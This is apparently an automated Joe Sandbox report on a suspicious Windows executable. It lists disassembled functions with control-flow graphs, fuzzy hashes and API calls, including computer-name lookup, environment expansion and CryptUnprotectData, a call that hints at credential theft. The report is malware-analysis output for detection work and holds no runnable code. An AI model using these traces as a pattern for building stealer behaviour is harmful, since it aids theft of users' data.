249->252 254 b15a23-b15a3f 250->254 251->240 252->250 252->252
                                                  APIs
                                                  • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 00B154D4
                                                  • GetComputerNameExA.KERNELBASE(00000005,00000000,00000200), ref: 00B155DF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID: ComputerName
                                                  • String ID: -#)$$147m
                                                  • API String ID: 3545744682-3639003421
                                                  • Opcode ID: a2561784d35fe969d136d5b30e0fec8ed8df2bf34bf05eaa47f1c5aba239b72f
                                                  • Instruction ID: 570b08e50e344376079287bbf0b2415701c666a462c2a729d2fa5f1f95929e98
                                                  • Opcode Fuzzy Hash: a2561784d35fe969d136d5b30e0fec8ed8df2bf34bf05eaa47f1c5aba239b72f
                                                  • Instruction Fuzzy Hash: 12328B70508F80CAD736CB34C8A47E7BBE1AF56309F88499DC4EB9B282C7796546CB51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B15082 Relevance: 7.6, APIs: 2, Strings: 2, Instructions: 573COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 255 b15082-b15095 257 b15097-b150a0 255->257 258 b150b6-b150ba 255->258 259 b150c1-b150c8 257->259 260 b150a2-b150b1 257->260 258->259 262 b15106 259->262 263 b150ca 259->263 261 b1514c-b1514f 260->261 266 b15150-b15159 261->266 265 b15108-b1510f 262->265 264 b150d0-b15102 263->264 264->264 267 b15104 264->267 268 b15111-b1511c 265->268 269 b1511e-b15134 265->269 266->266 270 b1515b-b151de 266->270 267->265 271 b15137-b1513d 268->271 269->271 272 b151e0-b15213 270->272 273 b15215-b1521e 270->273 274 b15145-b1514a 271->274 275 b1513f-b15141 271->275 272->272 272->273 276 b15220-b15226 273->276 277 b1523b-b15247 273->277 274->261 275->261 281 b15143 275->281 278 b15230-b15239 276->278 279 b15249-b1524f 277->279 280 b1525b-b15266 277->280 278->277 278->278 282 b15250-b15259 279->282 284 b15271-b152e0 call b27b20 280->284 285 b15268-b1526e call af8850 280->285 281->270 282->280 282->282 291 b152e2 284->291 292 b15336-b1533f 284->292 285->284 295 b152f0-b15334 291->295 293 b15341-b15347 292->293 294 b1535b-b15367 292->294 296 b15350-b15359 293->296 297 b15369-b1536f 294->297 298 b1537b-b1540a call b27b20 294->298 295->292 295->295 296->294 296->296 299 b15370-b15379 297->299 303 b1545d-b15466 298->303 304 b1540c-b1540f 298->304 299->298 299->299 306 b15468-b1546f 303->306 307 b1547b-b15487 303->307 305 b15410-b1545b 304->305 305->303 305->305 310 b15470-b15479 306->310 308 b15489-b1548f 307->308 309 b1549b-b1552c call b27b20 GetComputerNameExA 307->309 311 b15490-b15499 308->311 314 b15578-b15581 309->314 315 b1552e-b1552f 309->315 310->307 310->310 311->309 311->311 317 b15583-b15589 314->317 318 b1559b-b155a7 314->318 316 b15530-b15576 315->316 316->314 316->316 319 b15590-b15599 317->319 320 b155a9-b155af 318->320 321 b155bb-b15630 GetComputerNameExA 318->321 319->318 319->319 322 b155b0-b155b9 320->322 323 b15680-b15689 321->323 324 b15632 321->324 322->321 322->322 325 b156ab-b156b7 323->325 326 b1568b-b15691 323->326 327 b15640-b1567e 324->327 329 b156b9-b156bf 325->329 330 b156cb-b1572d 325->330 328 b156a0-b156a9 326->328 327->323 327->327 328->325 328->328 331 b156c0-b156c9 329->331 333 b15773-b1577c 330->333 334 b1572f 330->334 331->330 331->331 336 b1579b-b157a7 333->336 337 b1577e-b15784 333->337 335 b15730-b15771 334->335 335->333 335->335 339 b157a9-b157af 336->339 340 b157bb-b15837 call b27b20 336->340 338 b15790-b15799 337->338 338->336 338->338 341 b157b0-b157b9 339->341 345 b15879-b15882 340->345 346 b15839 340->346 341->340 341->341 348 b15884-b1588a 345->348 349 b1589b-b158a0 345->349 347 b15840-b15877 346->347 347->345 347->347 350 b15890-b15899 348->350 351 b158c6-b158d2 349->351 350->349 350->350 352 b158d8-b158dc 351->352 353 b1596e-b15970 351->353 354 b158b0-b158b2 352->354 355 b158de-b158fe 352->355 356 b15974-b159bc 353->356 361 b158b7-b158c0 354->361 357 b15930-b1593b 355->357 358 b15900-b15903 355->358 359 b159f9-b15a02 356->359 360 b159be-b159bf 356->360 357->361 363 b15941-b15969 357->363 358->357 362 b15905-b15920 358->362 365 b15a04-b15a0a 359->365 366 b15a1b-b15a1e call b1a600 359->366 364 b159c0-b159f7 360->364 361->351 367 b15972 361->367 362->361 363->361 364->359 364->364 368 b15a10-b15a19 365->368 370 b15a23-b15a3f 366->370 367->356 368->366 368->368
                                                  APIs
                                                  • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 00B154D4
                                                  • GetComputerNameExA.KERNELBASE(00000005,00000000,00000200), ref: 00B155DF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID: ComputerName
                                                  • String ID: -#)$$147m
                                                  • API String ID: 3545744682-3639003421
                                                  • Opcode ID: 54c678fd37dcccff3e9250fd2dd3639ceffc4ec22c54cce762ef5b513334baa7
                                                  • Instruction ID: 931bbfaf1664a93482302ab187fbba75c1143ec11e2434bd96a1b5d4f6171a1d
                                                  • Opcode Fuzzy Hash: 54c678fd37dcccff3e9250fd2dd3639ceffc4ec22c54cce762ef5b513334baa7
                                                  • Instruction Fuzzy Hash: AF226870508F80CAD736CB34C8A47E7BBE1AF56309F88099DD4EB9B282C7796546CB51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B14AAE Relevance: 7.6, APIs: 2, Strings: 2, Instructions: 572COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 371 b14aae-b15266 373 b15271-b152e0 call b27b20 371->373 374 b15268-b1526e call af8850 371->374 380 b152e2 373->380 381 b15336-b1533f 373->381 374->373 384 b152f0-b15334 380->384 382 b15341-b15347 381->382 383 b1535b-b15367 381->383 385 b15350-b15359 382->385 386 b15369-b1536f 383->386 387 b1537b-b1539a call b27b20 383->387 384->381 384->384 385->383 385->385 388 b15370-b15379 386->388 390 b1539f-b153af 387->390 388->387 388->388 391 b153b2-b1540a 390->391 392 b1545d-b15466 391->392 393 b1540c-b1540f 391->393 395 b15468-b1546f 392->395 396 b1547b-b15487 392->396 394 b15410-b1545b 393->394 394->392 394->394 399 b15470-b15479 395->399 397 b15489-b1548f 396->397 398 b1549b-b154a9 call b27b20 396->398 400 b15490-b15499 397->400 402 b154ae-b1552c GetComputerNameExA 398->402 399->396 399->399 400->398 400->400 403 b15578-b15581 402->403 404 b1552e-b1552f 402->404 406 b15583-b15589 403->406 407 b1559b-b155a7 403->407 405 b15530-b15576 404->405 405->403 405->405 408 b15590-b15599 406->408 409 b155a9-b155af 407->409 410 b155bb-b15630 GetComputerNameExA 407->410 408->407 408->408 411 b155b0-b155b9 409->411 412 b15680-b15689 410->412 413 b15632 410->413 411->410 411->411 414 b156ab-b156b7 412->414 415 b1568b-b15691 412->415 416 b15640-b1567e 413->416 418 b156b9-b156bf 414->418 419 b156cb-b1572d 414->419 417 b156a0-b156a9 415->417 416->412 416->416 417->414 417->417 420 b156c0-b156c9 418->420 422 b15773-b1577c 419->422 423 b1572f 419->423 420->419 420->420 425 b1579b-b157a7 422->425 426 b1577e-b15784 422->426 424 b15730-b15771 423->424 424->422 424->424 428 b157a9-b157af 425->428 429 b157bb-b15837 call b27b20 425->429 427 b15790-b15799 426->427 427->425 427->427 430 b157b0-b157b9 428->430 434 b15879-b15882 429->434 435 b15839 429->435 430->429 430->430 437 b15884-b1588a 434->437 438 b1589b-b158a0 434->438 436 b15840-b15877 435->436 436->434 436->436 439 b15890-b15899 437->439 440 b158c6-b158d2 438->440 439->438 439->439 441 b158d8-b158dc 440->441 442 b1596e-b15970 440->442 443 b158b0-b158b2 441->443 444 b158de-b158fe 441->444 445 b15974-b159bc 442->445 450 b158b7-b158c0 443->450 446 b15930-b1593b 444->446 447 b15900-b15903 444->447 448 b159f9-b15a02 445->448 449 b159be-b159bf 445->449 446->450 452 b15941-b15969 446->452 447->446 451 b15905-b15920 447->451 454 b15a04-b15a0a 448->454 455 b15a1b-b15a1e call b1a600 448->455 453 b159c0-b159f7 449->453 450->440 456 b15972 450->456 451->450 452->450 453->448 453->453 457 b15a10-b15a19 454->457 459 b15a23-b15a3f 455->459 456->445 457->455 457->457
                                                  APIs
                                                  • GetComputerNameExA.KERNELBASE(00000006,00000000,00000200), ref: 00B154D4
                                                  • GetComputerNameExA.KERNELBASE(00000005,00000000,00000200), ref: 00B155DF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID: ComputerName
                                                  • String ID: -#)$$147m
                                                  • API String ID: 3545744682-3639003421
                                                  • Opcode ID: 1ba3679b9716df9073bc2cbf7655e3f920d27805c099006d67a810de9385b8b9
                                                  • Instruction ID: d13ec6cdb30f171453cfeaab93a97c0be06f56da7b069b529e543274f39773cb
                                                  • Opcode Fuzzy Hash: 1ba3679b9716df9073bc2cbf7655e3f920d27805c099006d67a810de9385b8b9
                                                  • Instruction Fuzzy Hash: 4222AA70504F80CAD736CB34C8A47E7BBE1AF56305F88499DC8EB9B282C739A546CB51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF49B0 Relevance: 5.5, Strings: 4, Instructions: 486COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 488 af49b0-af49d2 call af8840 491 af49d8-af49ff 488->491 492 af5044-af504d 488->492 493 af4a06-af4a0e call af8840 491->493 494 af4a01 491->494 496 af4a13-af4a1c 493->496 494->493 497 af4ea5-af4eae call af8850 496->497 498 af4a22-af4a37 496->498 497->492 499 af4a55-af4a5e 498->499 501 af4a90-af4a98 499->501 502 af4a60-af4a65 499->502 506 af4ac2-af4acc 501->506 504 af4a67-af4a6b 502->504 505 af4a40-af4a42 502->505 508 af4a74-af4a7c 504->508 507 af4a46-af4a4f 505->507 506->507 507->499 509 af4ad1-af4ad8 507->509 510 af4a7e-af4a83 508->510 511 af4a70-af4a72 508->511 512 af4adf-af4c22 call af88c0 * 3 509->512 513 af4ada 509->513 510->511 511->508 514 af4aa0-af4aaf call af8860 511->514 524 af4cbc-af4cd9 call af33c0 512->524 525 af4c28-af4c3d 512->525 513->512 514->505 519 af4ab1-af4abd 514->519 519->506 531 af4cdf-af4e73 524->531 532 af4eb3-af4eb4 524->532 527 af4c80-af4ca6 call af33c0 525->527 534 af4ca8-af4cba 527->534 535 af4c40-af4c7e call af33c0 527->535 536 af4ed6-af4f0d 531->536 537 af4e75-af4e7e 531->537 533 af4f84-af4f9a call af8850 * 2 532->533 533->492 534->535 535->524 535->527 538 af4f0f 536->538 539 af4f6c-af4f6e 536->539 540 af4e94-af4e9c 537->540 541 af4e80 537->541 544 af4f10-af4f6a 538->544 545 af4f9f-af4fa1 539->545 546 af4f70-af4f73 539->546 548 af4e9e-af4ea3 540->548 549 af4e90-af4e92 540->549 547 af4f79-af4f83 541->547 544->539 544->544 552 af4ffc-af5040 call af8850 545->552 553 af4f75-af4f77 546->553 554 af4fa3-af4fb8 546->554 547->533 548->549 549->540 555 af4eb9-af4ec5 call af8860 549->555 552->492 559 af4fba-af4fbd 553->559 554->559 555->547 564 af4ecb-af4ed3 555->564 559->552 562 af4fbf-af4fc3 559->562 565 af4fd0-af4ffa 562->565 564->536 565->552 565->565
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: )$IDAT$IEND$IHDR
                                                  • API String ID: 0-3181356877
                                                  • Opcode ID: 7de0f068de70cdce8f3f56fd096d63f29e2cdf9dbaaf4a73d4361614e8476f1b
                                                  • Instruction ID: 007ef8e6ae4a6e36f3f19a23b78b5be5ef7bdbc8a4ee8644280d8620758d47bd
                                                  • Opcode Fuzzy Hash: 7de0f068de70cdce8f3f56fd096d63f29e2cdf9dbaaf4a73d4361614e8476f1b
                                                  • Instruction Fuzzy Hash: AD022371A083858FD710DF69D84076B7BE1EF89304F05856CFA858B392D739D909CB92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF16C0 Relevance: 4.4, Strings: 3, Instructions: 615COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: false$null$true
                                                  • API String ID: 0-2913297407
                                                  • Opcode ID: 7dcd05fa515e04d620ff8d733c946d713addefea46035f9be891d18ce12ec15a
                                                  • Instruction ID: 3a97b3aa96346fffbc45bfba32b6b9be6f1b8da1b9f1dde2e116db07d93afaa4
                                                  • Opcode Fuzzy Hash: 7dcd05fa515e04d620ff8d733c946d713addefea46035f9be891d18ce12ec15a
                                                  • Instruction Fuzzy Hash: 031209B460030DDBD7206FA6DC45736BBE4EF50348F184538FA8A87252EB75E915CB92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B05470 Relevance: 3.2, APIs: 2, Instructions: 164COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 817 b05470-b05487 818 b05490-b05499 817->818 818->818 819 b0549b-b054bc RtlExpandEnvironmentStrings 818->819 820 b054c5 819->820 821 b054be-b054c3 819->821 822 b054c8-b05543 call af8840 RtlExpandEnvironmentStrings 820->822 821->822 825 b05545 822->825 826 b05598-b055cc 822->826 827 b05550-b05596 825->827 828 b055d5-b055d7 826->828 829 b055ce-b055d3 826->829 827->826 827->827 830 b055da-b055f1 call af8840 828->830 829->830 833 b05611-b05621 830->833 834 b055f3-b055ff 830->834 836 b05641-b05655 call b28530 833->836 837 b05623-b0562a 833->837 835 b05600-b0560f 834->835 835->833 835->835 840 b0565a-b05676 836->840 838 b05630-b0563f 837->838 838->836 838->838
                                                  APIs
                                                  • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 00B054AD
                                                  • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 00B054DC
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID: EnvironmentExpandStrings
                                                  • String ID:
                                                  • API String ID: 237503144-0
                                                  • Opcode ID: eb0278528681425122d9b9167d304968cdf859025e9ef73a8787f6299a9f936d
                                                  • Instruction ID: a15368c8bf34730a53dcdffdb62c80d29dca03e6dd1d549e638d86f2aa4f8325
                                                  • Opcode Fuzzy Hash: eb0278528681425122d9b9167d304968cdf859025e9ef73a8787f6299a9f936d
                                                  • Instruction Fuzzy Hash: 1251BE702083409BD330CF24C891BAB77E5FF86364F408A1CE99A9B7D1DB74A904CB96
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B10D80 Relevance: 3.0, Strings: 2, Instructions: 519COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 851 b10d80-b10dab 852 b11050-b11060 851->852 853 b11070-b1109c call b257f0 851->853 854 b11040 851->854 855 b10db2-b10dba 851->855 856 b11004-b11028 call b292b0 851->856 857 b10e0f-b10fae 851->857 858 b1102f-b11038 851->858 852->853 866 b11111-b11120 call b28e30 853->866 867 b110b0-b110fd call af8810 call b28fa0 853->867 868 b11150-b111ac 853->868 869 b11290-b112cd 853->869 870 b11370 853->870 871 b11223 853->871 872 b11382-b113d4 853->872 873 b11372-b1137b 853->873 874 b11134-b1113c 853->874 875 b1121d 853->875 876 b1125f-b11266 853->876 854->852 855->857 856->853 856->854 856->858 860 b10fb0-b10fe3 857->860 861 b10fe5-b10ff2 call b28e30 857->861 858->854 860->860 860->861 877 b10ff7-b10ffd 861->877 902 b11125-b1112d 866->902 919 b11102-b1110a 867->919 884 b111f5-b11206 call b29980 868->884 885 b111ae-b111af 868->885 894 b112cf 869->894 895 b1130e-b11316 869->895 879 b11230-b11237 871->879 896 b113d6 872->896 897 b1141e-b11426 872->897 873->866 873->867 873->868 873->869 873->870 873->871 873->872 873->873 873->874 873->875 873->876 886 b114b0 873->886 887 b1149d-b114a2 873->887 888 b114df-b114ec 873->888 889 b114c0 873->889 890 b114a4-b114aa 873->890 891 b114c6 873->891 892 b1148d-b11496 873->892 893 b114cd-b114d8 873->893 883 b11365-b11368 874->883 875->871 881 b11281-b11289 876->881 882 b11268-b1126b 876->882 877->852 877->853 877->854 877->856 877->858 908 b11251-b11256 879->908 909 b11239-b1123f 879->909 881->879 910 b11270-b1127f 882->910 883->870 913 b1120b-b11216 884->913 903 b111b0-b111f3 885->903 887->890 888->866 888->868 888->869 888->870 888->871 888->873 888->874 888->875 888->876 888->886 888->887 888->888 888->889 888->890 888->891 888->892 888->893 890->886 891->893 892->886 892->887 892->888 892->889 892->890 892->891 892->893 893->866 893->868 893->869 893->870 893->871 893->873 893->874 893->875 893->876 893->886 893->887 893->888 893->889 893->890 893->891 893->892 893->893 898 b112d0-b1130c 894->898 899 b11360 895->899 900 b11318-b11322 895->900 905 b113e0-b1141c 896->905 906 b11470-b11486 call b282f0 897->906 907 b11428-b11432 897->907 898->895 898->898 899->883 911 b11330-b11337 900->911 902->868 902->869 902->870 902->871 902->873 902->874 902->875 902->876 902->886 902->887 902->888 902->889 902->890 902->891 902->892 902->893 903->884 903->903 905->897 905->905 906->886 906->887 906->888 906->889 906->890 906->891 906->892 906->893 914 b11440-b11447 907->914 908->876 915 b11240-b1124f 909->915 910->881 910->910 917 b11340-b11346 911->917 918 b11339-b1133c 911->918 913->869 913->870 913->871 913->873 913->875 913->876 913->886 913->887 913->888 913->889 913->890 913->891 913->892 913->893 920 b11450-b11456 914->920 921 b11449-b1144c 914->921 915->908 915->915 917->899 924 b11348-b1135f call b25970 917->924 918->911 923 b1133e 918->923 919->866 919->868 919->869 919->870 919->871 919->873 919->874 919->875 919->876 919->886 919->887 919->888 919->889 919->890 919->891 919->892 919->893 920->906 926 b11458-b1146f call b25970 920->926 921->914 925 b1144e 921->925 923->899 924->899 925->906 926->906
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: QS$UW
                                                  • API String ID: 0-2307071442
                                                  • Opcode ID: 522d249e51fe4045171133c968402bbef04c22fbad7a45a82844d2ca4224bb94
                                                  • Instruction ID: fdab57e456e0014a05e830fd7cae4ada1f303f5141e2844f453cb4250d81f55f
                                                  • Opcode Fuzzy Hash: 522d249e51fe4045171133c968402bbef04c22fbad7a45a82844d2ca4224bb94
                                                  • Instruction Fuzzy Hash: DE0275B5600B01CBD7248F29D891BA7B7F5FB49304F548E5CD1AA8BAA1DB34E446CB84
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B10DF0 Relevance: 3.0, Strings: 2, Instructions: 486COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: QS$UW
                                                  • API String ID: 0-2307071442
                                                  • Opcode ID: 9a72f4a9d8755d478a683ae3ee93cd1eadd46c4f3e8cc6d14301aee7fe8a51e0
                                                  • Instruction ID: b6bd88b1da398ccff47a6b821d3b59ab77a884f7af6a59d8f3c0edc4426c7b18
                                                  • Opcode Fuzzy Hash: 9a72f4a9d8755d478a683ae3ee93cd1eadd46c4f3e8cc6d14301aee7fe8a51e0
                                                  • Instruction Fuzzy Hash: 9D0255B5600B01CBD724CF29D891BA7B7E5FB49304F548E6CD1AB8BAA1DB34E446CB44
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B06645 Relevance: 1.5, APIs: 1, Instructions: 28encryptionCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00B06677
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107342163.0000000000E12000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107676770.00000000013DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_af0000_file.jbxd
                                                  Similarity
                                                  • API ID: CryptDataUnprotect
                                                  • String ID:
                                                  • API String ID: 834300711-0
                                                  • Opcode ID: 47e2a0c8dadbc7ee7bd380053e0c79caa0b95676a1cb78b9a4aea4d0be3b8f48
                                                  • Instruction ID: 0f6eb22e474e2c08d3d804b26391fe3349dfeb0d182b2eb49330238d8c8f4ed6
                                                  • Opcode Fuzzy Hash: 47e2a0c8dadbc7ee7bd380053e0c79caa0b95676a1cb78b9a4aea4d0be3b8f48
                                                  • Instruction Fuzzy Hash: 07E01270554746AFE238CF20CC51F7B73EDEB98605F20462EE25193190E931E402CF55
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B25970 Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LdrInitializeThunk.NTDLL(00B286FC,005C003F,00000006,00120089,?,00000018,A8A9AEAF,00000000,00B0510A), ref: 00B25996
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2107090805.0000000000AF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AF0000, based on PE: true
                                                  • Associated: 00000000.00000002.2107073233.0000000000AF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107121957.0000000000B2A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107140039.0000000000B2D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2107159430.0000000000B38000.00000020.00000001.01000000.00000003.sdmpDownload File
